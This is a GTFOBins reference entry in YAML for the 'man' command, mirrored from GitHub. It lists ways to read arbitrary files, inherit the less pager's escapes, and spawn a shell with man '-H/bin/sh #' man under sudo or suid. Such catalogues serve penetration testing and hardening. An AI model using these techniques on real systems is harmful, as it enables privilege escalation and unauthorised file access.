1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/man
2026-01-12 01:16:43 +01:00

33 lines
567 B
Bash

---
functions:
file-read:
- code: |-
man /path/to/input-file
comment: |-
The file is shown somehow formatted and displayed in the default pager.
contexts:
sudo:
suid:
unprivileged:
inherit:
- code: |-
man man
contexts:
sudo:
suid:
unprivileged:
from: less
shell:
- code: |-
man '-H/bin/sh #' man
comment: |-
This requires GNU `troff` (`groff`) to be installed.
contexts:
sudo:
suid:
shell: true
unprivileged:
version: |-
GNU
...